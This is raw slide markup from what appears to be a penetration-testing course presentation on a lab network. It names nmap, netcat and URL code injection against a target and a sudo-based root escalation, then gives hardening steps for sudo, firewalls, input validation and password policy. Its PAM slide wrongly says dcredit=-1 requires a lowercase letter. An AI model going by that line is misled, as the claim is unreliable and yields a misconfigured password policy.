          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;p56"/>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rmAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-533400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enable password for sudo privilege</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-533400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configuring “NO PASSWORD” option in sudo privilege is a critical vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4100" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-488950" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upgrade sudo version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( “apt-get” )</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-488950" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The CVE-2006-0151 vulnerability is in ‘sudo’ version 1.6.8 p9 and below, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in the OS is necessary.</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440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subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18883525" y="2427933"/>
            <a:ext cx="4836300" cy="10092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">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Network</a:t>
            </a:r>
            <a:endParaRPr sz="2625" b="1">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Address Range: 192.168.1.1/20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Netmask: 255.255.240.0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Gateway: 10.0.0.1</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Machines</a:t>
            </a:r>
            <a:endParaRPr sz="2625">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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192.168.1.90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Kali</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192.168.1.110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Target 1</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192.168.1.115</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Target 2</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10.0.0.25 </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Windows</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Azure</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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2575"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Google Shape;134;p21"/>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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p21"/>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136" name="Google Shape;136;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1520825" y="2067363"/>
            <a:ext cx="16186350" cy="1081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nmap and netcat on Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;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40</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10658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A firewall can help prevent a nmap scan or shut them down if configured properly.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WordPress has Firewall Plugins available for easy installation for non-developer users that routes website traffic through a cloud proxy server.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All traffic should be denied by default. Then, only allowed traffic is added in. Choose the allowed traffic based on the following parameters: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Source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Port</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Protocol of the Traffic </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="22860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1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It works because only legitimate users can access the web server.</a:t>
            </a:r>
            <a:endParaRPr sz="4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url code injection on Target 2</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;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sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p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lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" i="1">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Validate and sanitize url inputs</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9144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Scan for escape characters or other special symbols for the application language and operating system, such as comment marks.</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Create a whitelist for a limited set of values for the url.</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b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Treat all data as untrusted.</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444" name="Google Shape;444;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18097100" y="6613025"/>
            <a:ext cx="5549075" cy="5549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9"/>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450" name="Google Shape;450;p59"/>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451" name="Google Shape;451;p5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42</a:t>
            </a:fld>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57" name="Google Shape;457;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sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717425" y="2237525"/>
            <a:ext cx="22942800" cy="18447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sz="4600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install the Sucuri Security plugin made for WordPress</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://wordpress.org/plugins/sucuri-scanner/</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="459" name="Google Shape;459;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428325" y="4082225"/>
            <a:ext cx="15520850" cy="1640175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Google Shape;460;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323300" y="5722400"/>
            <a:ext cx="13200492" cy="749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66" name="Google Shape;466;p6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44</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="467" name="Google Shape;467;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2694225"/>
            <a:ext cx="11757126" cy="8831025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="468" name="Google Shape;468;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12653175" y="2694225"/>
            <a:ext cx="11757124" cy="883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74" name="Google Shape;474;p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45</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="475" name="Google Shape;475;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3045175"/>
            <a:ext cx="11591974" cy="8548125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="476" name="Google Shape;476;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12818325" y="3045175"/>
            <a:ext cx="11591974" cy="87525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82" name="Google Shape;482;p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sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295150" y="2142925"/>
            <a:ext cx="22942800" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="358"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12874" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Editing user permission and configuration files is a good way to patch your system. </a:t>
            </a:r>
            <a:endParaRPr sz="12874" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="6743">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-412009" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="96653"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9194">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11348">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irstly let’s edit our sudoers file to make sure that only the right accounts have access, such as removing steven who is listed in the sudoers file which we were able to use his privilege to escalate to root access. </a:t>
            </a:r>
            <a:endParaRPr sz="11348">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="11348">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-462809" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="11348">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo visudo</a:t>
            </a:r>
            <a:endParaRPr sz="11348">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358"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="484" name="Google Shape;484;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7060300" y="4433425"/>
            <a:ext cx="17113226" cy="8357275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="485" name="Google Shape;485;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="295150" y="6562500"/>
            <a:ext cx="6187377" cy="4851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91" name="Google Shape;491;p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47</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870300" y="2387850"/>
            <a:ext cx="20775900" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16350" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now let’s edit our password configuration files.</a:t>
            </a:r>
            <a:endParaRPr sz="16350" b="1">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Firstly edit the /etc/login.defs to set up password expiration</a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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Now let’s edit the /etc/pam.d/common-password file to set up password parameters.</a:t>
            </a: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minlen=8 (or any #of character length to the line: </a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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password requisites such as:</a:t>
            </a:r>
            <a:endParaRPr sz="16350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4114800" lvl="8" indent="-488156" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ucredit=-1 (at least 1 uppercase letter) dcredit=-1 (at least 1 lowercase letter) ocredit=-1 (at least 1 special or other character) </a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="493" name="Google Shape;493;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9081538" y="8120850"/>
            <a:ext cx="8353425" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="494" name="Google Shape;494;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9381575" y="3829050"/>
            <a:ext cx="7753350" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="Google Shape;495;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8543373" y="12254550"/>
            <a:ext cx="9429750" cy="819150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Google Shape;496;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609161" y="9361375"/>
            <a:ext cx="5280516" cy="3960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2" name="Google Shape;502;p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48</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Google Shape;503;p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25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
